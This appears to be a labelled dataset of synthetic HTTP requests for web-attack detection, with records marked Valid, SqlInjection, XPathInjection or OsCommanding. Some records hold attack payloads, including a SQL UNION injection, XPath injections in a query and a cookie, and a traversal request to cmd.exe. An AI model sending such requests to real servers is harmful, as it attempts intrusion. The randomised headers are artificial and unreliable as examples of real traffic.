GET /ls03eu/uo5iOe0s3maevaqaieay/fl/alaaenwSdIleS/slitmhisedaeeMo9yc/2H_I5Wg/AeyekoaOkr3ideteat/tMc.sh?2aiu6sr8oi=wgetrg&BGEiB5si0XKetc=2JzvuhaqxAM&eeaxibeol=%27select+customer_phone+++%27%7C%7C%27from+++++customers++%27%7C%7C%27where++customer_surname%3D%27%27%27%7C%7C+++lv_surname%7C%7C%27%27%27++++and+customer_type%3D1%27%3B&Zu@mkuA-6vJ=+k%29+mot&aqoqgomasy=ia2j+c5ipiiir86mstes&anntkspn=of+yo&0stflentisa=lmTee HTTP/1.1
Host: 4.42.48.42
Connection: close
Accept: */*
Accept-Charset: iso-8859-4
Accept-Encoding: *
Accept-Language: z-rohe, the-t;q=0.9, EricsF-OuwnoFEa
Cache-Control: no-transform
Client-ip: 240.50.140.120
Cookie: rgsehrtnl3EaR=375728;yhea=j vls2apshsnullNformc;tnUeN3ednErtN=be.;epiof=8Ae
Cookie2: $Version="46"
Date: Thu, 28 Feb 08 11:12:45 GMT
ETag: "zWjqHOL2ecS3XXB"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sun, 21 Aug 05 19:29:33 UTC
If-Unmodified-Since: Sun, 24 Jan 10 12:27:10 CET
If-Match: "2.1tjLpRQmTbkolUBX"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic RXRsdmNVTDpzaXB0
Range: -256
Referer: /efsk/ohx7eiz/uh2m.wav
TE: gzip;q=0.2,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 8.5; A1-lk; rv:8.5.9) Gecko/25041755
UA-CPU: MIPS
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 927x5675
Via: 7ee/6.1 196.216.120.158, FTP/0.0 www.1tmhapa.html, 6.7 163.28.121.133:7083
Transfer-Encoding: tut2ei; aehnijo=uir4h
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42054
Start - Id: 14447
class: Valid
GET /tUwvM/lerth/eia0/sT4oa/nwK-pIClKAvpwB/nssd.mspx?IoWdcihqoo2=ila0J2_&fnss=oeostsreplace4%25aey%40rn&B.RA9=srgVoQ&E3Usznio=838491&sp5dxii4=Yaoo9evtsEm4m&sR5PE=iB%402xEjrKVa&ncpDtehoog=9&eIyenie=peRh9euJ&cssciocmenXm=r-o-%26&RexecbdtmpkexecbgsoundcGl=tnetcatts%25a+nOax&buo8nemhAr=phb%3EThnh HTTP/1.0
Host: www.Oe3etgfntc.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.0
Accept-Language: Spah-sdaec;q=0.3, uog-ihrl9;q=0.2
Cache-Control: no-transform
Client-ip: 255.146.199.17
Cookie: RBw7Y=tiaihs0nc;dsiesbie=DsaRe;onsx8aoNIts0m=99717543
Cookie2: $Version="15"
Date: Sun, 22 Jan 06 03:55:00 GMT
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Mon, 02 Jun 08 22:52:01 GMT
If-Unmodified-Since: Thu, 08 Jun 06 24:34:24 UTC
If-Match: "qTAMkO9ZMrqDareTGRBI"
If-None-Match: *
If-Range: Fri, 14 Oct 05 06:19:41 CET
Max-Forwards: 924
MIME-Version: 2.3
Pragma: a6='6ye'
Proxy-Authorization: oa7d0 neletwg=tdqaeth
Authorization: Basic cm5Hcm5zcjphcnRyY3Rh
Range: -517,627-,587-701
Referer: /t9oi/Iuei/roieg/teotsrpB.js
TE: gzip;q=0.9,deflate;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/7.6 (X11; U; Unix 4.2; st-ea; rv:5.7.2) Gecko/00752160
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5927x518
Via: HTTP/3.9 246.65.10.128
Transfer-Encoding: Sn4Te; o6olaweo=zelney2s
Upgrade: nen/1.1, Bsb/4.0, Nijin/7.5
Warning: 990 www.n3Met.jpeg "edoEbbedhymE8" "Wed, 21 Nov 07 03:10:58 GMT"
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 505939828971
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14447
Start - Id: 33478
class: Valid
POST /4R2_co_ppLftp-uI/plwrot/hct1Wtsi/oazNTl1i./Aahsoemcnh9c.css? HTTP/1.0
Content-Length: 231
Content-Language: nSreHhs,fvintqtc,t9
Content-Encoding: gzip
Content-Location: http://swTry8gs.com/ySteRl/cLlUe/etnof/tdai.pdf
Content-MD5: T1l5ZTN0M3N1emlFaW5tdw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 15 Jun 09 19:53:44 GMT
Last-Modified: Fri, 20 Mar 09 20:07:02 UTC
Host: www.nnu6hlh.fr
Connection: close
Accept: application/rtf, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: grw='a'
Client-ip: 223.229.235.206
Cookie: y2o3onf=39;aorfsBnaInd=0013;ltiih=vu1exsr8n7e3e;3oak6to1=iDfvg-6;DD=800;qs=u
Cookie2: $Version="2"
Date: Thu, 04 Jan 07 06:40:27 UTC
ETag: "N@YIkvlv7W2brt-"
Expect: oetImrSk
From: haatwh@aC7Dxl.ch
If-Modified-Since: Thu, 14 Sep 06 21:57:45 CET
If-Unmodified-Since: Tue, 26 Oct 04 09:16:59 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 313
MIME-Version: 6.6
Pragma: emmkz='eefgfn7u'
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: Digest response="f7bBfbe605f27eEca48cAddBf56aaD6C"
Range: 408-106,8887-956063
Referer: http://www.c1nWa.it/gicndta/RhTaw/etcolNa.mp3
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: ueyethPiesaEgIay6Scs
UA-CPU: x86
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: urjha/8.6 www.9sahl.jpg
Transfer-Encoding: compress
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 159.146.237.86
X-Serial-Number: 944908095975390
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d1vdnzrtte=nar d shs&ijaeHdedri=1&ytsSi=7829&nnae=3468&7agi=826&haoalt=ae2Ooepohtl&6o1ttfl8ngsae3=sRw>&qum=on%uhe& d&bwlmdgAi=kPqeoKkCr6g&nMgRs-vQ._V=04923220&eehUuu07ebpe=aeeevXlilotsaa&nrnpe1i=reo2Rtes:adminih%Tz r<E 

End - Id: 33478
Start - Id: 34038
class: Valid
POST /uZ7i/aSHWcu8Zvdj/I8/ael9rieneraih5/0VYO9wiframeTobjectE8Jexec/deleteX0_2execOnjBOR_6o/e8sShu/a3/aTweeonnW8bLqaEeao.html? HTTP/1.0
Content-Length: 8
Content-Language: h5,sdrtgxrr,cnle
Content-Encoding: compress
Content-Location: /ehi0po/rnkdvk/esodm.sh
Content-MD5: cmhjMnpyYWI5dzB3N3Jhcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Mar 07 10:05:19 UTC
Last-Modified: Fri, 23 Feb 07 04:39:30 GMT
Host: 81.235.153.177
Connection: tame
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: lerar5io=rrtseg
Client-ip: 98.173.105.29
Cookie: eo6sxoodeea=2208;kh5i6oy3atwa=gandGdcatsadtmp$+p;izawGd=4gslltertUattiw;tfqwp=yxAwP
Cookie2: $Version="899"
Date: Mon, 30 Oct 06 18:31:52 UTC
ETag: "Z-Q6Tru9Of9V8gU"
Expect: urgclmR=tame3ii;etsbwiO=d770ef
From: nfaArT@c8eeenfHb.org
If-Modified-Since: Sat, 12 Jul 08 08:58:29 GMT
If-Unmodified-Since: Mon, 03 Oct 05 03:27:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Jan 07 10:23:03 GMT
Max-Forwards: 7
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic c2U0Qm86cmFvMg==
Range: -72
Referer: /ixnz.jsp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/9.3 (Windows; U; Win98 1.8; Ex-ao; rv:6.6.0) Gecko/67686034
UA-CPU: PowerPC
UA-Disp: 6904,9748,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 682x2942
Via: HTTP/8.2 www.hwzmng.html, 1.4 www.otteiter.js, 5.8 www.f59nia.gif:72690
Transfer-Encoding: epsmd; hhyrohz8=iOiv
Upgrade: anaia/9.7, aiu/9.9, oWi5re/8.7
Warning: 786 www.n2xtrct.html "oNtzTur" 
X-Forwarded-For: 104.247.66.182
X-Serial-Number: 312663342
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ratbt=ne

End - Id: 34038
Start - Id: 41855
class: SqlInjection
GET /3osa9lYezTgIE@quS/1OFPhpt1u_o9DVHJa/r-9aD8lNqJcUApMVc/jaHHF-AFjJ/shulHfe/mD_V9TcXeqUL7eobi/iRfEnP.REBLN/j5D2BCC02dX/nas/QKgrcpsystem.jsp?r3nM=%27++++%29++++UNION+ALL+SELECT+++96550+FROM++dxnac8almo++++WHERE+%28++%27%27+++%3D++++%27&Cc=irnrvwservicesa&sats0Aomsew=lRiZKWsWchym&Molwedo1niet6ie=07523656&bodyvarCiTXwureplaceD=9784839064&a2C14=lomLb&rhohcmvt5xes3ra=akr+5&dravttnkcmo=tAdK%405qNEk&e0tohe7hc=f77DnF&fVmetav=eej&re4dh=1qeXw1b52l&8pLwMXa=6&7rz8R2hwa=6dig&rhCyv=%5DcMoterene&5EvartIikseseli=ifqoletF HTTP/1.0
Host: www.soand6esna.biz
Connection: eacerc
Accept: text/xml;q=0.0, application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 78.57.136.131
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="555"
Date: Mon, 24 Jan 05 11:09:44 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: rpih
From: dupNd@t1Lces4e.com
If-Modified-Since: Sat, 03 Jul 04 01:28:23 UTC
If-Unmodified-Since: Sun, 17 Sep 06 23:59:17 UTC
If-Match: "vHS_MizqwV7EMvuY"
If-None-Match: *
If-Range: Thu, 18 May 06 24:27:09 CET
Max-Forwards: 2
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: NTLM dEhyZkxyTW9yaEQzYWZmMmN0YWh1YU8yc3RkZWFhaHBubDc5YW4=
Range: -521,-331719
Referer: http://aadHt.st/rceyiivc/uuihsws/eehnv2a/tbHEwf/rwfNyzee.cgi
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 2.1; 9x-us; rv:3.2.3) Gecko/40641789
UA-CPU: PowerPC
UA-Disp: 7520,1896,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: deflate
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 10397953831192510
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41855
Start - Id: 8561
class: Valid
GET /yG53OgSdkJ0o/Ubdbgsoundiframey/pDktWcL-zBhau.3J0/iWCOJSVFA/9slfiIyC0bahtlc/d3ahoaombcp6unossaee/ROumywd/usdi9ot8rs.tiff?8Gehpiuei=tap HTTP/1.1
Host: www.sneaob.org
Connection: close
Accept: text/*, text/*;q=0.4
Accept-Charset: windows-1253;q=0.5
Accept-Encoding: 
Accept-Language: essHnie-iwe;q=0.2, ispR-eqzN, t-asihnf
Cache-Control: no-transform
Client-ip: 133.24.95.115
Cookie: el1a1o=42856209;Sraf=naoeincludelwbet|ecat 
Cookie2: $Version="54"
Date: Thu, 05 Oct 06 16:27:26 GMT
ETag: W/"xDX2W8T9A@lrb-.t"
Expect: 100-continue
From: hiao@Soldae.uk
If-Modified-Since: Fri, 30 Jun 06 09:31:57 CET
If-Unmodified-Since: Mon, 30 Aug 04 15:53:38 CET
If-Match: "p_c-boDzHAkmzmbIVyO"
If-None-Match: "B@A0I1laXyDA4i0@L"
If-Range: Sun, 03 Sep 06 13:25:55 UTC
Max-Forwards: 9481
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest qop=8dbndemk
Authorization: NTLM aGZibnR5YWFlYXRveG5kYXMyc3Jhc3JiZWVvdExyeWFIbWhyVG94bmVvZXl0c2k=
Range: 42276-,673-
Referer: http://ettm.ch/AeibUae/senzie/enk2/etjo.js
TE: trailers,trailers
Trailer: Pragma
User-Agent: adsbLoSesx/9.7
UA-CPU: Sparc
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 108x957
Via: 9ent/4.4 3.179.110.9
Transfer-Encoding: deflate
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 962 29.200.220.17:9962 "dseiv8noti" 
X-Forwarded-For: 94.123.141.158
X-Serial-Number: 1101244
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8561
Start - Id: 50053
class: XPathInjection
PUT /trR53fXlLM/pmesiceNs9i5/7hVx5ZpPhome.asp? HTTP/1.0
Content-Length: 271
Content-Language: ghv0e
Content-Encoding: deflate
Content-Location: http://odn6x.de/oeueaog3/Tson/Rnihseu4/n5ope0O.cfm
Content-MD5: c3Nhcm5lc3dpZVR0OW9ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Jun 05 08:10:52 UTC
Last-Modified: Sat, 23 Jun 07 11:54:07 GMT
Host: 143.246.158.147
Connection: keep-alive
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, compress, deflate, deflate;q=0.3, identity;q=0.3
Accept-Language: emOb-nse6;q=0.6, ril-bfe6ljtr, Uma-l
Cache-Control: min-fresh=8
Client-ip: 189.156.251.248
Cookie: retiD=(i  <   count(Tgue/child::text())    and    j < count(sieoc/child::comment())   and  k <   count(pi/child::*) )
Cookie2: $Version="644"
Date: Mon, 17 Mar 08 01:12:15 UTC
ETag: "AQZ5z3@UY7Pqgl1l@yA"
Expect: 100-continue
From: dtlece@N4narCi.fr
If-Modified-Since: Sun, 16 Aug 09 12:17:01 UTC
If-Unmodified-Since: Sat, 04 Dec 04 06:10:28 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 21 Oct 05 06:33:45 CET
Max-Forwards: 00
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dnQzYTh4b0hvbG1kNzJ2ZmFpdGVjMmdsdGxkdGRwY0F6dGxobnI=
Range: 522-,-4944
Referer: /csts/lepe/hamhxem.bin
TE: chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (Machintosh; U; PPC Mac OS X 7.5; ex-4e; rv:9.7.6) Gecko/14294935
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: 1.7 152.222.242.23, 4.5 www.LRernr.jpg, FTP/6.1 www.ldtt.js
Transfer-Encoding: compress
Upgrade: 6Kna1/5.3
Warning: 163 141.80.145.125:58 "atliahcou" 
X-Forwarded-For: 78.250.5.71
X-Serial-Number: 4431106659344342
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

adxN=te&e&lHosmochaea&ieectehvothvc=dej2eIrDaoaiaq9Ak&eTuBE4Awindow.openv=l0trh9inRiuen2tc&e4khtyfmMohauhy=0>ttcgltchild-:na&KgetmdP=61116011&3oene=e&CJfhthtal2sN=?ehn-eAc9dasrtgf&6kTYC7ZiL3Q=46962916&tpssiwczaan=ah20IW&uo6m=e&YxgrgOpsntrpse5=2633925901&sEu=slt

End - Id: 50053
Start - Id: 15908
class: Valid
GET /ntracnoeg7tn/koe/p-3DEv7mV/2otzttfiht/onfsaomrt7hEsuHo.cfm? HTTP/1.0
Host: www.35seno.com:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 12.135.89.242
Cookie: tZte=40;DFHd1Zo=f2Iv5UEgHg6j
Cookie2: $Version="8"
Date: Wed, 26 Oct 05 02:23:22 UTC
ETag: "tk-.QLr.a-duJ04A"
Expect: 100-continue
From: p3cchen@etaH.uk
If-Modified-Since: Fri, 02 Feb 07 19:12:06 GMT
If-Unmodified-Since: Tue, 11 Sep 07 18:15:52 UTC
If-Match: "SQN@son55PMqnQN"
If-None-Match: *
If-Range: "NZL-.u@I4xAaNWp"
Max-Forwards: 8
MIME-Version: 2.7
Pragma: a=ehrsjele
Proxy-Authorization: Basic bzNsdzppc2xo
Authorization: Basic TmZpZDoxcmIwZGk=
Range: 24232-,-81,-37455
Referer: http://www.xmrsay.biz/Hs5yaSa.nsf
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 6.8; kn-ao; rv:9.7.9) Gecko/66997624
UA-CPU: x86
UA-Disp: 820,979,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 723x196
Via: 3Ret0d/8.6 195.149.8.1, 7.6 www.Jbbjeu.png, HTTP/0.0 105.106.153.110
Transfer-Encoding: 2t1si; iPtreAh=Sd3exs
Upgrade: afum9l/8.2, fEaii8/5.9, som/7.2
Warning: 168 www.pbkslL.tiff "cad37ddmsf" "Thu, 31 Jan 08 09:57:52 UTC"
X-Forwarded-For: 185.247.30.17
X-Serial-Number: 721965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15908
Start - Id: 48764
class: XPathInjection
GET /aI/G_JFRuCr1/KPZyB8Z/tg9tcmsEn0tv8orwnnrP/n9pY2C5oAtb/uCjmBAGNva3dtr_y/epKGs.gif?m7=adybGs%27+++or+6++%3C+++++count%28path%2Fchild%3A%3A*%29+++or++%27y0td%27%3D%27 HTTP/1.1
Host: 130.207.202.232
Connection: uaulHz
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: loe-IaeSan5e;q=0.9, uioei-gtlenrtn
Cache-Control: min-fresh=49
Client-ip: 7.16.5.141
Cookie: zed=140547;TITexec=183;Z1opty6=oi4kMawhrynyi;iikBitt=eiE n;iqowowtseLsrd=3129419115
Cookie2: $Version="80"
Date: Wed, 29 Apr 09 06:44:10 GMT
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Sun, 12 Aug 07 03:43:33 CET
If-Unmodified-Since: Fri, 19 Mar 04 08:16:29 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: Wed, 03 Nov 04 10:36:40 GMT
Max-Forwards: 8
MIME-Version: 1.8
Pragma: ceet=ewcI
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: Digest algorithm=MD5-sess
Range: 11-
Referer: http://e3fn.net/dsvups/Oine/ciA8Gtt/rihI/eIraf.jpeg
TE: chunked;q=0.6,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.9 (X11; U; Unix 4.3; 0e-5d; rv:0.8.6) Gecko/88412255
UA-CPU: MIPS
UA-Disp: 924,263,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0640x829
Via: 3.9 www.edesotms.tiff:1, 3.4 201.178.12.215:8619, nntpp/4.8 www.ltTci.jpg
Transfer-Encoding: hjte
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 362 201.253.51.98 "cwsHUxseAmledEt" "Tue, 17 Oct 06 16:09:16 UTC"
X-Forwarded-For: 98.154.59.21
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48764
Start - Id: 32573
class: Valid
POST /ccfZBGuQlW2GopMVED/deie1aetcls0j/gaH.cfm? HTTP/1.1
Content-Length: 178
Content-Language: 7l
Content-Encoding: gzip
Content-Location: http://eqmt.fr/te8E/sbnNAep/v9g5.gif
Content-MD5: ZFNuZm5zeUZpdXJueHRuRw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 May 04 10:57:31 GMT
Last-Modified: Fri, 12 Jan 07 18:05:21 CET
Host: 193.146.48.28
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: 6fmlSd='mcae'
Client-ip: 242.34.36.191
Cookie: vw=59553;oznBeeeFtanii=3;OHuk=amW2;uamA=38;ne=e3Hvbscriptyhnes;5mcnEoRneoA=rd8
Cookie2: $Version="11"
Date: Tue, 06 Nov 07 02:34:39 UTC
ETag: W/"r1njqjg8r.WGaKtmk"
Expect: rstRie
If-Modified-Since: Fri, 10 Sep 04 07:57:28 UTC
If-Unmodified-Since: Wed, 29 Nov 06 23:12:33 CET
If-Match: *
If-None-Match: "0eHFA25ZUjjA@Ar847t"
If-Range: Fri, 02 Oct 09 04:59:13 CET
Max-Forwards: 96
MIME-Version: 0.6
Pragma: aelh='azaSced'
Proxy-Authorization: ver8pp eioenefh=Tspc
Authorization: roePI eaInrrcs=nmnnje
Range: 020-733
Referer: /riae7/naOoio/nndis/ei1yt/ahlsTb.nsf
TE: gzip,gzip;q=0.6
Trailer: Accept-Charset
User-Agent: outgu9beddt
UA-CPU: Sparc
UA-OS: FreeBSD
Via: 4.9 164.251.62.194, 2.2 www.mehre8.tiff
Transfer-Encoding: identity
Upgrade: cgi/1.4, epao/0.4, nn4n/4.3
Warning: 126 5.73.194.31 "reohmamomewte5o" 
X-Forwarded-For: 117.186.15.80
X-Serial-Number: 34552
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

N6nh1eoOnAkxINa=l+r)~neenAcheee&tn4ewc4mHfm=Ndgoscriptl3&oalRofdm=1967332850&t6hesabelzzboo=eom &Onps3JW1F=oD9Nu&l8yutdpMbuw=snePcbmvsosD&JadminC6Og@s=ypsperl&4PbImA=mn5oae

End - Id: 32573
Start - Id: 20180
class: Valid
GET /hsrttrrdgkmpi/htseetnnlo3fehoo/ii/koo/m@t7GtxKAp5-Aj/4YS7Tgac1DTkCE/t@/cXAuT.YS8CnzE8.k4/0k.bin?ogor5yot5PretS=7912240281&ypaxr8atscre2E=h4p.Bn&TMXiframe=ifoc&thrt7nerysseea=okQiiA&iEaet9g=odSbu1&ses8pYy=vsaform+l%5Bytdtmp-0t%3Bh%24viy&UTyui7BFt=u7JFMwvkN-&evwve3ctrein=31992236&auer=6 HTTP/1.0
Host: 232.99.242.52
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 124.87.119.255
Cookie: Grtw2=0702559;ey4lnpaqtexsn=32384;3F=hskyM;andbgsound4bZb=Nalpkernteoteuil
Cookie2: $Version="97"
Date: Sun, 20 Nov 05 04:03:57 GMT
ETag: W/"yG3JG3scvyp8FAK4oj0"
Expect: n5mbdad
From: bgcY@aessp.com
If-Modified-Since: Sun, 09 Sep 07 18:36:35 UTC
If-Unmodified-Since: Thu, 07 Oct 04 04:50:01 UTC
If-Match: "wf1rGbtsRxubkHA4WD."
If-None-Match: "qlqh-Oq6MJmquiqlV"
If-Range: Wed, 28 Jul 04 21:32:56 CET
Max-Forwards: 16
MIME-Version: 7.1
Pragma: eo=I
Proxy-Authorization: drij yiNes=2wtgpw
Authorization: NTLM dDVNb2NiYWxpZWxjbWhidUVlSGdlYW1lNnJlbGVibHJla2l0ZGVwblhs
Range: 365749-,607-065
Referer: /ehaSlue/anAlLMO/eaaa.mpg
TE: trailers
Trailer: If-None-Match
User-Agent: h47VtD_i8X http://www.y4ijs8.uk
UA-CPU: StrongARM
UA-Disp: 909,081,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 199x535
Via: 0.2 51.191.170.57:4945, 3.9 www.tpwcl.js
Transfer-Encoding: gzip
Upgrade: oieit/1.6, oam/2.4, hter/6.0, edl/2.6, anna/8.1
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 67067
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20180
Start - Id: 10175
class: Valid
GET /maguYfCX2Fv_3ihv/cjCElqo5P/u8KpaRlyqheY2y/aacLpf/sessoiejo/rrhor/mrnlsr/08wWs/f35sbCfJ/HJzZBxbetweencz4Z@-from/el6Si.vPRuC3CrQQJ.asp?u2nsh6=nbF625&rnfeo1j0urarQsn=Sshsew6&ttdiyEyanaiSr0=eTieqhiad%26+da&yrle=36739931&iblnRhctden=ue%3ETta%5C+lw&eesAnwi=Gctaesictls&db=%25orbb%3C&ggle=7&ak0=5YwUgnk6&gdae9tf7esL=cfid&t3toekIt0e=i+mee HTTP/1.1
Host: www.nu4dep.net
Connection: close
Accept: application/rtf;q=0.5, video/*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: iibc0-9hid;q=0.1
Cache-Control: no-cache
Client-ip: 206.184.127.225
Cookie: ocoI2inn3s4f3=ygOn0gnpscgnr
Cookie2: $Version="50"
Date: Thu, 19 Feb 04 03:57:41 UTC
ETag: W/"RB0Ulkg5F0E9CcvlO"
Expect: 100-continue
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Mon, 10 Sep 07 03:02:51 GMT
If-Unmodified-Since: Sat, 23 Jun 07 09:46:24 UTC
If-Match: *
If-None-Match: *
If-Range: "sIMaGone6rQPQS80"
Max-Forwards: 26
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="CDB8b7E2F9f0EDC6361Fa4aeeA7555b2"
Range: -56
Referer: /fyqre.htm
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: Warning
User-Agent: 096s/5.7
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: 0.3 www.eksss.shtml
Transfer-Encoding: identity
Upgrade: imhr/0.1, n6leen/2.1, iPhT/4.2
Warning: 842 www.ktzeHh.shtml "eDtsrAi" 
X-Forwarded-For: 104.138.147.78
X-Serial-Number: 87261
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10175
Start - Id: 44109
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: 255.34.139.70:80
Connection: i8hwhle
Accept: */*
Accept-Charset: x-mac-hebrew, windows-1251, cp-950;q=0.3, koi8;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 249.225.32.40
Cookie: cuhwme4aae=647
Cookie2: $Version="81"
Date: Mon, 12 Jul 04 12:15:26 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 22 May 04 13:54:30 CET
If-Unmodified-Since: Tue, 23 Feb 10 01:55:18 CET
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 6
MIME-Version: 4.3
Pragma: T=6hHjaal
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 827-
Referer: /wSWDiew1/saymnt/Rmliicrf/rnolg.css
TE: deflate
Trailer: Date
User-Agent: 3h_Xwim http://www.netwo.fr
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 378 196.189.21.245:66 "hoiooiLnwuhilt51e" "Sun, 15 Jan 06 06:34:10 UTC"
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
